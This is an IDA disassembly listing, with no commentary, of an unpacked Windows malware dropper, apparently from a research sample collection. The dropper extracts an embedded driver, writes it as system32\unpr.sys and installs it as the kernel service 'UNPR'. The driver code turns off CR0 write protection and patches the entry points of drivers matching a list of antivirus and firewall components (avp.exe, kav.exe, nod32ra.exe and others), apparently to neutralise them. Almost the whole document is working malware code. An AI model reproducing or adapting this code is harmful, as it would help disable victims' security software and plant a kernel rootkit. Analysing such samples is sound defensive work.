;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : E1B5BF999F5EDE0001ABEB61CCB024DC
; File Name : u:\work\e1b5bf999f5ede0001abeb61ccb024dc_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000182 ( 386.)
; Section size in file : 00000182 ( 386.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
public start
start proc near
mov dword_403010, 94h
push offset dword_403010
call sub_401152 ; GetVersionExA
cmp dword_403014, 5
jnz loc_40112D
cmp dword_403018, 0
jz loc_40112D
push 104h
push offset dword_403114
push 0
call sub_401146 ; GetModuleFileNameA
push 0
push 0
push 3
push 0
push 3
push 80000000h
push offset dword_403114
call sub_40113A ; CreateFileA
xchg eax, ebx
push 0
push 0
push 0A00h
push ebx
call sub_40115E ; SetFilePointer
push 0
push offset dword_407114
push 4000h
push offset dword_403114
push ebx
call sub_401158 ; ReadFile
push ebx
call sub_401134 ; CloseHandle
push 104h
push offset dword_403010
call sub_40114C ; GetSystemDirectoryA
push offset aUnpr_sys ; "\\unpr.sys"
push offset dword_403010
call sub_40116A ; lstrcat
push 0
push 0
push 1
push 0
push 1
push 40000000h
push offset dword_403010
call sub_40113A ; CreateFileA
cmp eax, 0FFFFFFFFh
jz short loc_40112D
xchg eax, ebx
push 0
push offset dword_407114
push dword_407114
push offset dword_403114
push ebx
call sub_401164 ; WriteFile
push ebx
call sub_401134 ; CloseHandle
push 0F003Fh
push 0
push 0
call sub_40117C ; OpenSCManagerA
test eax, eax
xchg eax, ebx
jz short loc_40112D
push 0
push 0
push 0
push 0
push 0
push offset dword_403010
push 1
push 0
push 1
push 0F01FFh
push offset aUnpr ; "UNPR"
push offset aUnpr ; "UNPR"
push ebx
call sub_401176 ; CreateServiceA
test eax, eax
jz short loc_401127
push eax
call sub_401170 ; CloseServiceHandle
loc_401127: ; CODE XREF: start+11F�j
push ebx
call sub_401170 ; CloseServiceHandle
loc_40112D: ; CODE XREF: start+1B�j start+28�j ...
push 0
call sub_401140 ; ExitProcess
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401134 proc near ; CODE XREF: start+80�p start+DB�p
jmp ds:dword_402034
sub_401134 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40113A proc near ; CODE XREF: start+53�p start+B7�p
jmp ds:dword_40202C
sub_40113A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401140 proc near ; CODE XREF: start+12F�p
jmp ds:dword_402028
sub_401140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401146 proc near ; CODE XREF: start+3A�p
jmp ds:dword_40201C
sub_401146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40114C proc near ; CODE XREF: start+8F�p
jmp ds:dword_402010
sub_40114C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401152 proc near ; CODE XREF: start+F�p
jmp ds:dword_402014
sub_401152 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401158 proc near ; CODE XREF: start+7A�p
jmp ds:dword_402018
sub_401158 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40115E proc near ; CODE XREF: start+63�p
jmp ds:dword_402030
sub_40115E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401164 proc near ; CODE XREF: start+D5�p
jmp ds:dword_402020
sub_401164 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40116A proc near ; CODE XREF: start+9E�p
jmp ds:dword_402024
sub_40116A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401170 proc near ; CODE XREF: start+122�p start+128�p
jmp ds:dword_402004
sub_401170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401176 proc near ; CODE XREF: start+118�p
jmp ds:dword_402000
sub_401176 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40117C proc near ; CODE XREF: start+E9�p
jmp ds:dword_402008
sub_40117C endp
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000001A6 ( 422.)
; Section size in file : 000001A6 ( 422.)
; Offset to raw data for section: 00002000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 402000h
dword_402000 dd 77E2BF4Bh ; DATA XREF: sub_401176�r
dword_402004 dd 77DDAB2Fh ; DATA XREF: sub_401170�r
dword_402008 dd 77DDA20Bh ; DATA XREF: sub_40117C�r
align 10h
dword_402010 dd 77E704FCh ; DATA XREF: sub_40114C�r
dword_402014 dd 77E7C657h ; DATA XREF: sub_401152�r
dword_402018 dd 77E78B82h ; DATA XREF: sub_401158�r
dword_40201C dd 77E7A099h ; DATA XREF: sub_401146�r
dword_402020 dd 77E79D8Ch ; DATA XREF: sub_401164�r
dword_402024 dd 77E74155h ; DATA XREF: sub_40116A�r
dword_402028 dd 77E75CB5h ; DATA XREF: sub_401140�r
dword_40202C dd 77E7A837h ; DATA XREF: sub_40113A�r
dword_402030 dd 77E78C81h ; DATA XREF: sub_40115E�r
dword_402034 dd 77E77963h ; DATA XREF: sub_401134�r
dd 0
dd 2088h, 2 dup(0)
dd 2150h, 2010h, 2078h, 2 dup(0)
dd 2198h, 2000h, 5 dup(0)
dd 2174h, 215Eh, 2186h, 0
dd 20F4h, 210Ah, 211Ah, 20DEh, 2138h, 2144h, 20D0h, 20C2h
dd 2126h, 20B4h, 0
dd 6C430019h, 4865736Fh, 6C646E61h, 320065h, 61657243h
dd 69466574h, 41656Ch, 78450075h, 72507469h, 7365636Fh
dd 10F0073h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
db 44h ; D
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 160h
aGetversionexa db 'GetVersionExA',0
dw 1FDh
aReadfile db 'ReadFile',0
align 2
dw 24Bh
aSetfilepointer db 'SetFilePointer',0
align 4
dd 725702B9h, 46657469h, 656C69h, 736C02D3h, 61637274h
dd 4174h, 4E52454Bh, 32334C45h, 6C6C642Eh, 320000h
aCloseserviceha db 'CloseServiceHandle',0
align 4
aA db 'A',0
aCreateservicea db 'CreateServiceA',0
align 2
dw 12Fh
aOpenscmanagera db 'OpenSCManagerA',0
align 4
aAdvapi32_dll db 'ADVAPI32.dll',0
align 2
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 00004118 ( 16664.)
; Section size in file : 00004118 ( 16664.)
; Offset to raw data for section: 00003000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 403000h
aUnpr_sys db '\unpr.sys',0 ; DATA XREF: start+94�o
aUnpr db 'UNPR',0 ; DATA XREF: start+10D�o start+112�o
align 10h
dword_403010 dd 575C3A43h ; DATA XREF: start�w start+A�o ...
dword_403014 dd 4F444E49h ; DATA XREF: start+14�r
dword_403018 dd 535C5357h ; DATA XREF: start+21�r
aYstem32Unpr_sy db 'ystem32\unpr.sys',0
align 10h
dd 39h dup(0)
dword_403114 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 ; DATA XREF: start+33�o
; start+4E�o ...
dd 40h, 8 dup(0)
dd 0B8h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 0DA42F1A5h, 3 dup(892C90E1h), 892D90E1h, 892C90E4h
dd 893FB3B8h, 892C90E2h, 893EB01Dh, 892C90E0h, 68636952h
dd 892C90E1h, 2 dup(0)
dd 4550h, 5014Ch, 47364871h, 2 dup(0)
dd 10E00E0h, 0C05010Bh, 1E0h, 520h, 0
dd 363h, 280h, 3A0h, 10000h, 2 dup(20h), 4, 0
dd 4, 0
dd 980h, 280h, 0F61Dh, 1, 100000h, 1000h, 100000h, 1000h
dd 0
dd 10h, 2 dup(0)
dd 840h, 28h, 6 dup(0)
dd 900h, 70h, 0Ch dup(0)
dd 3A0h, 18h, 6 dup(0)
a_text db '.text',0
align 4
dd 114h, 280h, 120h, 280h, 3 dup(0)
dd 68000020h, 6164722Eh, 6174h, 18h, 3A0h, 20h, 3A0h, 3 dup(0)
dd 48000040h, 7461642Eh, 61h, 480h, 3C0h, 480h, 3C0h, 3 dup(0)
dd 0C8000040h, 54494E49h, 0
dd 0A8h, 840h, 0C0h, 840h, 3 dup(0)
dd 0E2000020h, 6C65722Eh, 636Fh, 72h, 900h, 80h, 900h
dd 3 dup(0)
dd 42000040h, 2 dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFDCh
push esi
push edi
mov eax, [ebp+8]
movzx ecx, word ptr [eax]
mov edi, [eax+4]
shr ecx, 1
push 5Ch
mov edx, edi
pop eax
loc_4033AC: ; CODE XREF: .data:004033B3�j
repne scasw
jnz short loc_4033B5
mov edx, edi
jmp short loc_4033AC
; ---------------------------------------------------------------------------
loc_4033B5: ; CODE XREF: .data:004033AF�j
mov eax, [ebp+10h]
mov edi, edx
test byte ptr [eax+1], 1
jnz short loc_4033CC
mov esi, 10646h
mov ecx, 1Eh
jmp short loc_4033D6
; ---------------------------------------------------------------------------
loc_4033CC: ; CODE XREF: .data:004033BE�j
mov esi, 10808h
mov ecx, 0Eh
loc_4033D6: ; CODE XREF: .data:004033CA�j
; .data:004033E7�j
lodsd
push ecx
push eax
push edi
call sub_40349C
add esp, 8
pop ecx
test eax, eax
jz short loc_4033EF
loop loc_4033D6
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_4033EF: ; CODE XREF: .data:004033E5�j
mov eax, [ebp+10h]
test byte ptr [eax+1], 1
jnz short loc_403444
push dword ptr [ebp+0Ch]
pop dword ptr [ebp-8]
and dword ptr [ebp-4], 0
mov dword ptr [ebp-20h], 18h
and dword ptr [ebp-1Ch], 0
and dword ptr [ebp-18h], 0
and dword ptr [ebp-14h], 0
and dword ptr [ebp-10h], 0
lea eax, [ebp-8]
push eax
lea eax, [ebp-20h]
push eax
push 1
lea eax, [ebp-24h]
push eax
call sub_40348A
test eax, eax
jnz short loc_403471
push 0
push dword ptr [ebp-24h]
call sub_403490
push dword ptr [ebp-24h]
call sub_403496
jmp short loc_403471
; ---------------------------------------------------------------------------
loc_403444: ; CODE XREF: .data:004033F6�j
mov eax, [eax+4]
mov edx, [eax+3Ch]
mov edi, [edx+eax+28h]
add edi, eax
mov eax, [edi]
mov edx, cr0
cli
push edx
and edx, 0FFFEFFFFh
mov cr0, edx
mov ax, 0C031h
stosw
mov eax, 8C2h
stosd
pop edx
mov cr0, edx
sti
loc_403471: ; CODE XREF: .data:0040342E�j
; .data:00403442�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10280h
call sub_4034A2
xor eax, eax
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40348A proc near ; CODE XREF: .data:00403427�p
jmp dword ptr ds:103B0h
sub_40348A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403490 proc near ; CODE XREF: .data:00403435�p
jmp dword ptr ds:103A0h
sub_403490 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403496 proc near ; CODE XREF: .data:0040343D�p
jmp dword ptr ds:103A4h
sub_403496 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40349C proc near ; CODE XREF: .data:004033DA�p
jmp dword ptr ds:103A8h
sub_40349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4034A2 proc near ; CODE XREF: .data:0040347F�p
jmp dword ptr ds:103ACh
sub_4034A2 endp
; ---------------------------------------------------------------------------
dd 3 dup(0)
dd 890h, 8A6h, 8B0h, 8BCh, 880h, 3 dup(0)
aAvp_exe:
unicode 0, <avp.exe>,0
aAvpm_exe:
unicode 0, <avpm.exe>,0
aA_0 db 'a',0
aVz_exe:
unicode 0, <vz.exe>,0
aB db 'b',0
aDmcon_exe:
unicode 0, <dmcon.exe>,0
aBdss_exe:
unicode 0, <bdss.exe>,0
aC db 'c',0
aCapp_exe:
unicode 0, <capp.exe>,0
aC_0 db 'c',0
aCevtmgr_exe:
unicode 0, <cevtmgr.exe>,0
aCclaw_exe:
unicode 0, <cclaw.exe>,0
aCcpxysvc_exe:
unicode 0, <ccpxysvc.exe>,0
aF db 'f',0
aSav32_exe:
unicode 0, <sav32.exe>,0
aFsbl_exe:
unicode 0, <fsbl.exe>,0
aF_0 db 'f',0
aSm32_exe:
unicode 0, <sm32.exe>,0
aG db 'g',0
aCasserv_exe:
unicode 0, <casserv.exe>,0
aIao_exe:
unicode 0, <iao.exe>,0
aIcmon_exe:
unicode 0, <icmon.exe>,0
aInetupd_exe:
unicode 0, <inetupd.exe>,0
aIssvc_exe:
unicode 0, <issvc.exe>,0
aKav_exe:
unicode 0, <kav.exe>,0
aKavss_exe:
unicode 0, <kavss.exe>,0
aKavsvc_exe:
unicode 0, <kavsvc.exe>,0
aK db 'k',0
aLswd_exe:
unicode 0, <lswd.exe>,0
db 'l',0
aIvesrv_exe:
unicode 0, <ivesrv.exe>,0
aM db 'm',0
aCshield_exe:
unicode 0, <cshield.exe>,0
aMsssrv_exe:
unicode 0, <msssrv.exe>,0
aN db 'n',0
aOd32krn_exe:
unicode 0, <od32krn.exe>,0
aNod32ra_exe:
unicode 0, <nod32ra.exe>,0
aPavfnsvr_exe:
unicode 0, <pavfnsvr.exe>,0
aR db 'r',0
aTvscan_exe:
unicode 0, <tvscan.exe>,0
aS db 's',0
aAvscan_exe:
unicode 0, <avscan.exe>,0
aZ db 'z',0
aClient_exe:
unicode 0, <client.exe>,0
dw 3C0h
dd 3D00001h, 3E20001h, 3F20001h, 4080001h, 41A0001h, 42E0001h
dd 4480001h, 45C0001h, 4760001h, 48C0001h, 49E0001h, 4B20001h
dd 4CC0001h, 4DC0001h, 4F00001h, 5080001h, 51C0001h, 52C0001h
dd 5400001h, 5560001h, 56A0001h, 5820001h, 59C0001h, 5B20001h
dd 5CC0001h, 5E40001h, 5FE0001h, 6160001h, 62E0001h, 620001h
dd 5F0063h, 610068h, 730073h, 5F0068h, 2E0066h, 790073h
dd 73h, 630062h, 69005Fh, 5F0070h, 2E0066h, 790073h, 73h
dd 630062h, 6E005Fh, 6E0067h, 73002Eh, 730079h, 620000h
dd 5F0063h, 610070h, 5F0074h, 2E0066h, 790073h, 73h, 630062h
dd 70005Fh, 740072h, 66005Fh, 73002Eh, 730079h, 620000h
dd 5F0063h, 640074h, 5F0069h, 2E0066h, 790073h, 73h, 630062h
dd 690066h, 74006Ch, 720065h, 73002Eh, 730079h, 620000h
dd 660063h, 640074h, 2E0069h, 790073h, 73h, 690066h, 74006Ch
dd 74006Eh, 73002Eh, 730079h, 6D0000h, 660070h, 720069h
dd 770065h, 6C0061h, 2E006Ch, 790073h, 73h, 610073h, 64006Eh
dd 6F0062h, 2E0078h, 790073h, 73h, 730076h, 610064h, 610074h
dd 74006Eh, 73002Eh, 730079h, 770000h, 740061h, 680063h
dd 6F0064h, 2E0067h, 790073h, 73h, 106BEh, 106DCh, 106F4h
dd 1070Ah, 10724h, 1073Eh, 10758h, 10772h, 10788h, 1079Eh
dd 107BCh, 107D4h, 107EEh, 1062Eh, 868h, 2 dup(0)
dd 8DAh, 3A0h, 5 dup(0)
dd 890h, 8A6h, 8B0h, 8BCh, 880h, 0
dd 775A0460h, 6E65704Fh, 636F7250h, 737365h, 775A048Eh
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 43E0000h
dd 6C43775Ah, 65736Fh, 775F04B0h, 63697363h, 706Dh, 73500309h
dd 4C746553h, 4964616Fh, 6567616Dh, 69746F4Eh, 6F527966h
dd 6E697475h, 746E0065h, 726B736Fh, 652E6C6Eh, 6578h, 7 dup(0)
db 70h ; p
align 4
db 0ADh ;
db 32h, 0B9h, 32h
db 67h ; g
db 33h, 78h, 33h
db 7Eh ; ~
db 33h, 84h, 33h
db 8Ah ; Š
db 33h, 90h, 33h
db 46h ; F
db 36h, 4Ah, 36h
db 4Eh ; N
db 36h, 52h, 36h
db 56h ; V
db 36h, 5Ah, 36h
db 5Eh ; ^
db 36h, 62h, 36h
db 66h ; f
db 36h, 6Ah, 36h
db 6Eh ; n
db 36h, 72h, 36h
db 76h ; v
db 36h, 7Ah, 36h
db 7Eh ; ~
db 36h, 82h, 36h
db 86h ; †
db 36h, 8Ah, 36h
db 8Eh ; Ž
db 36h, 92h, 36h
db 96h ; –
db 36h, 9Ah, 36h
db 9Eh ; ž
db 36h, 0A2h, 36h
db 0A6h ; ¦
db 36h, 0AAh, 36h
db 0AEh ; ®
db 36h, 0B2h, 36h
db 0B6h ; ¶
db 36h, 0BAh, 36h
db 8
db 38h, 0Ch, 38h
db 10h
db 38h, 14h, 38h
db 18h
db 38h, 1Ch, 38h
a88880848888 db ' 8$8(8,8084888<8',0
align 4
dd 0DA3h dup(0)
dword_407114 dd 980h ; DATA XREF: start+6A�o start+C4�o ...
_data ends
; Section 4. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00007200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 408000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start